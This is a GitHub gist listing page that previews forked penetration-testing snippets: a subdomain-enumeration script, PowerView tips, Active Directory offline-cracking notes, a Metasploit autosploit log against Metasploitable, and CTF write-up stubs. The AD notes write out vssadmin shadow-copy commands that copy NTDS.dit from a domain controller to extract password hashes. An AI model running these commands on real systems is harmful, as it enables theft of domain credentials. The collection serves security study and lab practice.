Web Application Hacker's Handbook Task checklist as a Github-Flavored Markdown file
FB fb11
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #@cihanmehmet tweets, @cihanmehmets | |
| if [[ $# -eq 0 ]] ; | |
| then | |
| echo "Usage: ./sub.sh findname2.com" | |
| exit 1 | |
| else | |
| curl 'https://crt.sh/?q=%.'$1'&output=json' | jq '.[] | {name_value}' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u |grep "name_value"|cut -d ' ' -f4 > $1.txt | |
| curl -s "http://web.archive.org/cdx/search/cdx?url=*."$1"/*&output=text&fl=original&collapse=urlkey" |sort| sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | uniq >>$1.txt |
fb11
/ WAHH_Task_Checklist.md
Created
March 6, 2019 21:38
— forked from amotmot/WAHH_Task_Checklist.md
The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
fb11
/ offsec.md
Created
December 22, 2018 08:49
— forked from jivoi/offsec.md
Penetrating Testing/Assessment Workflow
Penetrating Testing/Assessment Workflow & other fun infosec stuff
https://github.com/jivoi/pentest
My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*
- Reconnaissance
- Passive/Semi-Passive
- Tools
- Passive/Semi-Passive
- Discover - https://github.com/leebaird/discover
fb11
/ PowerView-3.0-tricks.ps1
Created
March 31, 2018 16:25
— forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
fb11
/ AD domain offline cracking #pentest
Created
March 10, 2018 22:48
— forked from ddouhine/AD domain offline cracking #pentest
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Microsoft stores the Active Directory data in tables in a proprietary ESE database format. The database is contained in the NTDS.dit (%SystemRoot%\ntds\NTDS.dit) file. | |
| This file is encrypted to prevent any data extraction, so we will need to acquire the key to be able to perform the extraction of the target data. | |
| The required Password Encryption Key is stored in the NTDS.dit file, but is encrypted itself with the BOOTKEY. | |
| To obtain this BOOTKEY, we need to acquire a copy of the SYSTEM registry hive (%SystemRoot%\System32\config\System) from the same Domain Controller as we acquired the NTDS.dit file. | |
| Extract NTDS/SYSTEM from a domain controller: | |
| net start vss | |
| vssadmin create shadow /for=c: | |
| vssadmin list shadows | |
| copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp |
fb11
/ resources.out
Created
March 10, 2018 22:02
— forked from Sliim/resources.out
msf autoscan & autosploit against metasploitable (script output, use `more`, `cat`..)
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Script started on Sun 28 Aug 2016 04:19:27 PM CEST | |
| [*] Starting the Metasploit Framework console.../ | |
| [*] Starting the Metasploit Framework console...- | |
| [*] Starting the Metasploit Framework console...\ | |
| [*] starting the Metasploit Framework console...| | |
| [*] STarting the Metasploit Framework console.../ | |
| [*] StArting the Metasploit Framework console...- | |
| [*] StaRting the Metasploit Framework console...\ | |
| [*] StarTing the Metasploit Framework console...| |
fb11
/ CTFWRITE-LazySysAdmin@VulnHub.md
Created
March 3, 2018 22:53
— forked from berzerk0/CTFWRITE-LazySysAdmin@VulnHub.md
CTF Writeup: LazySysadmin @ VulnHub
The official version is found at https://berzerk0.github.io/GitPage/CTF-Writeups/LazySysAdmin-VulnHub.html
A fun box from Vulnhub, written by Togie McDogie. You can find it here at https://www.vulnhub.com/entry/lazysysadmin-1,205/
fb11
/ CTFWRITE-ZorZ@Vulnhub.md
Created
March 3, 2018 22:53
— forked from berzerk0/CTFWRITE-ZorZ@Vulnhub.md
A Few WebApp File Upload Vulnerabilities Explained - CTF Writeup: Zorz
The official version is found at https://berzerk0.github.io/GitPage/CTF-Writeups/ZorZ-Vulnhub.html
This is "CTF" is more of a vulnerability sandbox than a true Capture the Flag challenge. However, it is a great way to explore some WebApp Upload vulnerabilities.
The VulnHub description says:
fb11
/ CTFWRITE-Europa-HTB.md
Created
March 3, 2018 22:53
— forked from berzerk0/CTFWRITE-Europa-HTB.md
CTF Writeup: Europa on HackTheBox
The official version is found at https://berzerk0.github.io/GitPage/CTF-Writeups/Europa-HTB.html
fb11
/ CTFWRITE-Blocky-HTB.md
Created
March 3, 2018 22:52
— forked from berzerk0/CTFWRITE-Blocky-HTB.md
CTF Writeup: Blocky on HackTheBox
The official version is found at https://berzerk0.github.io/GitPage/CTF-Writeups/Blocky-HTB.html
NewerOlder